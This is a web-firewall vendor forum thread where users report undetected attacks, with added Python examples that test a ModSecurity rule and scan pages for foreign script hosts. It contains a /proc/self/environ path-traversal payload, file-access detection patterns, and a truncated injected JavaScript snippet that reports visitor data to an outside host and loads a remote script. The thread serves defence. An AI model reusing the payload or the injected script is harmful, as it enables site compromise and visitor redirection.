Author Topic: Attacks and Exploits which are undetected  (Read 3187 times)

Offline vadim

  • Moderator
  • Comodo's Hero
  • *****
  • Posts: 334
Attacks and Exploits which are undetected
« on: March 05, 2015, 09:51:02 AM »
We would be grateful for any information about attacks and exploits which are undetected by Comodo WAF.

Thank you for all your feedback, which helps us to improve Comodo protection rules.
--
Vadim Lvovskiy
Development Manager
COMODO Group Inc.

Offline xanubi

  • Comodo Loves me
  • ****
  • Posts: 106
Re: Attacks and Exploits which are undetected
« Reply #1 on: March 25, 2015, 11:12:20 AM »

Offline ozsup

  • Newbie
  • *
  • Posts: 18
Re: Attacks and Exploits which are undetected
« Reply #2 on: April 28, 2015, 12:19:56 AM »

Offline Hedloff

  • Comodo Loves me
  • ****
  • Posts: 149
Re: Attacks and Exploits which are undetected
« Reply #3 on: April 30, 2015, 08:38:11 AM »
Magento ShopLift hack should be added ASAP!
Any ETA on that?

Offline ozsup

  • Newbie
  • *
  • Posts: 18
Re: Attacks and Exploits which are undetected
« Reply #4 on: May 12, 2015, 12:14:33 PM »
What's the point in asking users for input when the rules don't get added?

For example, the revslider rule has never been added to the LiteSpeed ruleset; refer to thread: https://forums.comodo.com/free-modsecurity-rules-comodo-web-application-firewall-b223.0/-t107211.0.html

Now we have the ShopLift hack from Magento, which also hasn't been patched. Hackers would have already reaped the benefits and dismantled as many sites as possible.

There's no point running a WAF if the rules are delayed by weeks or months... hackers will infiltrate before that time.

Offline xanubi

  • Comodo Loves me
  • ****
  • Posts: 106
Re: Attacks and Exploits which are undetected
« Reply #5 on: May 13, 2015, 06:24:41 AM »

Offline xanubi

  • Comodo Loves me
  • ****
  • Posts: 106
REVSLIDER
« Reply #6 on: May 15, 2015, 03:46:46 AM »
REVSLIDER continues.
This one is BIG, attacked on thousands of sites that still don't update, and it seems that it's very hard to update this plugin.

I thought CWAF blocked this, but it seems that it doesn't block it at all; OWASP does.

Please make a block on this one; just this night 10 WordPress sites were attacked with this. My antivirus rules blocked the shell file, but this is in the wild, free for everyone to attack.

https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html

Offline gshost

  • Newbie
  • *
  • Posts: 6
Re: Attacks and Exploits which are undetected
« Reply #7 on: July 23, 2015, 06:45:57 AM »
Hello,

There are many XML-RPC attacks. Can you make a rule for that? If there is a rule, can you post its number?

Thanks

Offline oetaz

  • Newbie
  • *
  • Posts: 12
Re: Attacks and Exploits which are undetected
« Reply #8 on: January 07, 2016, 09:29:41 AM »
Any update on any of these?

I reported https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html many months ago (in the report thread) and I'm still seeing it run wild.

Offline TDmitry

  • Head CWAF Rule Writing Team
  • Comodo's Hero
  • *****
  • Posts: 357
Re: Attacks and Exploits which are undetected
« Reply #9 on: January 07, 2016, 02:37:39 PM »
Quote from: oetaz on January 07, 2016, 09:29:41 AM
Any update on any of these?

I reported https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html many months ago (in the report thread) and I'm still seeing it run wild.
Do you know CVE id for this vulnerability?

Offline TDmitry

  • Head CWAF Rule Writing Team
  • Comodo's Hero
  • *****
  • Posts: 357
Re: Attacks and Exploits which are undetected
« Reply #10 on: January 07, 2016, 02:40:23 PM »
Quote from: gshost on July 23, 2015, 06:45:57 AM
Hello,

There are many XML-RPC attacks. Can you make a rule for that? If there is a rule, can you post its number?

Thanks
Sorry for the delayed reply. We have a set of rules starting from 240330 designed to protect users from XML-RPC attacks.

Offline oetaz

  • Newbie
  • *
  • Posts: 12
Re: Attacks and Exploits which are undetected
« Reply #11 on: January 13, 2016, 12:18:29 AM »

Offline LBJ

  • Newbie
  • *
  • Posts: 11
../../proc/self/environ exploits
« Reply #12 on: April 05, 2016, 12:39:43 PM »
CWAF currently does not protect vulnerable applications which do not correctly sanitize inputs of the form...

index.php?location=../../../../proc/self/environ

For background information, please see numerous articles such as...

https://www.exploit-db.com/papers/12886/

The current rule of...

Code:
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|XML:/*|!ARGS:/body/|!ARGS:code|!ARGS:/content/|!ARGS:/description/|!ARGS:/install\[values\]\[\w+\]\[fileDenyPattern\]/|!ARGS:/message/|!ARGS:Post|!ARGS:desc|!ARGS:text|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!ARGS:wpTextbox1 "(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)|boot\.ini|global\.asa|httpd\.conf)\b|/etc/)" \
"id:211190,rev:8,msg:'COMODO WAF: Remote File Access Attempt',phase:2,severity:2,capture,block,setvar:'tx.points=+%{tx.points_limit4}',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:'auditLogParts=+E',t:'none',t:'cmdLine'"

...should include protection of /proc/ to become...

Code:
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|XML:/*|!ARGS:/body/|!ARGS:code|!ARGS:/content/|!ARGS:/description/|!ARGS:/install\[values\]\[\w+\]\[fileDenyPattern\]/|!ARGS:/message/|!ARGS:Post|!ARGS:desc|!ARGS:text|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!ARGS:wpTextbox1 "(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)|boot\.ini|global\.asa|httpd\.conf)\b|/etc/|/proc/)" \
"id:211190,rev:8,msg:'COMODO WAF: Remote File Access Attempt',phase:2,severity:2,capture,block,setvar:'tx.points=+%{tx.points_limit4}',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:'auditLogParts=+E',t:'none',t:'cmdLine'"

Other rule sets include this protection, and I cannot see a downside to its inclusion. We have added a custom rule on our own servers, but it would be nice to have it included as standard in CWAF.
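As an added example (not code from the post, and not Comodo's rule set), the Python below replays the regex of rule 211190 exactly as quoted above, once as shipped and once with the /proc/ alternative, over a few constructed request URLs, and reports which ARGS / ARGS_NAMES targets each version would flag. The t:cmdLine step is approximated from ModSecurity's documented transformation list (an assumption that the list is complete); the host shop.example and the sample URLs are made up.

```python
"""Added example, not from the forum post or from Comodo's rule set.

Replays the regex of rule 211190 as quoted in the post, with and without the
/proc/ alternative, over constructed request URLs, and shows which parameters
each version flags. t:cmdLine is approximated from its documented steps
(assumption: the documented list is complete)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Regex from the posted rule as shipped (no /proc/ alternative).
ORIGINAL_PATTERN = re.compile(
    r"(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)"
    r"|boot\.ini|global\.asa|httpd\.conf)\b|/etc/)"
)
# The same regex with the /proc/ alternative the post asks for.
AMENDED_PATTERN = re.compile(
    r"(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)"
    r"|boot\.ini|global\.asa|httpd\.conf)\b|/etc/|/proc/)"
)


def cmd_line(value: str) -> str:
    """Approximation of ModSecurity's t:cmdLine: drop backslashes, quotes and
    carets, drop spaces before '/' and '(', turn ',' and ';' into spaces,
    collapse whitespace runs, lowercase. The lowercasing is why the rule
    behaves case-insensitively even though the regex has no (?i)."""
    value = re.sub(r'[\\"\'^]', "", value)
    value = re.sub(r" +(?=[/(])", "", value)
    value = re.sub(r"[,;]", " ", value)
    value = re.sub(r"\s+", " ", value)
    return value.lower()


def collect_args(url: str) -> list[tuple[str, str]]:
    """Build the rule's ARGS_NAMES and ARGS targets from a request URL: every
    query-string name and value, URL-decoded as the engine presents them."""
    targets = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        targets.append((f"ARGS_NAMES:{name}", name))
        targets.append((f"ARGS:{name}", value))
    return targets


def evaluate(url: str, pattern: re.Pattern) -> list[str]:
    """Variable names the pattern matches after t:cmdLine, i.e. the
    MATCHED_VAR_NAME values the rule would log for this request."""
    return [var for var, raw in collect_args(url) if pattern.search(cmd_line(raw))]


# Constructed sample requests (not traffic from the thread). The first one is
# the shape the post describes; the second is the same path URL-encoded.
SAMPLES = {
    "proc_environ": "http://shop.example/index.php?location=../../../../proc/self/environ",
    "proc_encoded": "http://shop.example/index.php?location=..%2F..%2F..%2Fproc%2Fself%2Fenviron",
    "etc_passwd": "http://shop.example/index.php?location=../../../../etc/passwd",
    "htaccess": "http://shop.example/download.php?file=.htaccess",
    "benign": "http://shop.example/index.php?location=products/shoes&page=2",
}


def compare(samples: dict[str, str] = SAMPLES) -> dict[str, tuple[list[str], list[str]]]:
    """For each sample: (variables flagged by the shipped regex,
    variables flagged by the amended regex)."""
    return {
        name: (evaluate(url, ORIGINAL_PATTERN), evaluate(url, AMENDED_PATTERN))
        for name, url in samples.items()
    }


if __name__ == "__main__":
    for name, (before, after) in compare().items():
        print(f"{name:13s} shipped={before or '-'}  with /proc/={after or '-'}")
```

Running it shows the gap the post describes: the /etc/ and .htaccess requests are flagged by both versions, the benign request by neither, and the /proc/self/environ traversal (plain or URL-encoded, since ARGS are decoded before the rule runs) only by the amended regex. Because the rule is scored (tx.points) rather than a hard block on its own, the surrounding anomaly threshold still decides whether the request is actually denied.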

Offline jarecki74

  • Newbie
  • *
  • Posts: 7
Re: Attacks and Exploits which are undetected
« Reply #13 on: March 19, 2017, 11:14:03 AM »
WordPress 4.7.3, PHP 5.3.29, Apache 2.2.x, cPanel/WHM

Found in the home page article source:

Code:
s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-

« Last Edit: March 19, 2017, 11:18:57 AM by jarecki74 »
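As an added example (not code from the post), the Python below is a small scanner for the kind of finding reported above: it reads page source, undoes the smart-quote mangling the pasted snippet shows, and reports every script source, whether a script tag's src attribute or an inline `.src =` assignment, whose host is not on the site's own host list. The HTML and the hosts shop.example / www.shop.example are constructed; the only value taken from the post is the gethere.info URL, and the inline block is shortened to that one line.

```python
"""Added example, not from the forum post: report script sources whose host is
outside a site's own hosts, the shape of the injected snippet quoted above.
The HTML and the site hosts are constructed; only the gethere.info URL is
taken from the post."""
import re
from urllib.parse import urlsplit

# Undo wptexturize-style smart quotes: the quoted snippet was mangled this way
# when pasted, and a scanner reading rendered HTML can meet the same characters.
SMART_QUOTES = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201a": "'",
                              "\u201c": '"', "\u201d": '"', "\u201e": '"'})

SCRIPT_TAG_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)", re.IGNORECASE)
SCRIPT_BODY = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
INLINE_SRC_ASSIGN = re.compile(r"\.src\s*=\s*[\"'](https?://[^\"']+)", re.IGNORECASE)


def external_script_hosts(html: str, allowed_hosts: set[str]) -> list[tuple[str, str]]:
    """Return (host, how) pairs for every script source whose host is not in
    allowed_hosts; 'how' is 'script tag src' or 'inline .src assignment'.
    Protocol-relative URLs (//host/...) are handled because urlsplit reads
    their netloc."""
    html = html.translate(SMART_QUOTES)
    findings = []
    for url in SCRIPT_TAG_SRC.findall(html):
        host = urlsplit(url).hostname
        if host and host not in allowed_hosts:
            findings.append((host, "script tag src"))
    for body in SCRIPT_BODY.findall(html):
        for url in INLINE_SRC_ASSIGN.findall(body):
            host = urlsplit(url).hostname
            if host and host not in allowed_hosts:
                findings.append((host, "inline .src assignment"))
    return findings


# Constructed page source: one legitimate script tag plus an inline block of the
# kind quoted in the post, shortened to the line carrying the external URL and
# written with the same smart quotes the pasted snippet shows.
SAMPLE_HTML = """<html><head>
<script src="https://shop.example/wp-includes/js/jquery/jquery.js"></script>
<script type="text/javascript">
s.src=\u2019http://gethere.info/kt/?264dpr&frm=script&se_referrer=\u2019 + encodeURIComponent(document.referrer);
</script>
</head><body><p>Welcome to the shop.</p></body></html>"""

SITE_HOSTS = {"shop.example", "www.shop.example"}

if __name__ == "__main__":
    for host, how in external_script_hosts(SAMPLE_HTML, SITE_HOSTS):
        print(f"external script host {host} ({how})")
```

Run over a site's rendered pages (for example from a nightly crawl), this turns a manual "look at the source" check into a diff against a known host list; any host that is not yours, your CDN, or an analytics provider you deliberately use is worth a look, and a hit from the same host across many posts usually means the database content or a theme file was modified rather than a single page.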

 
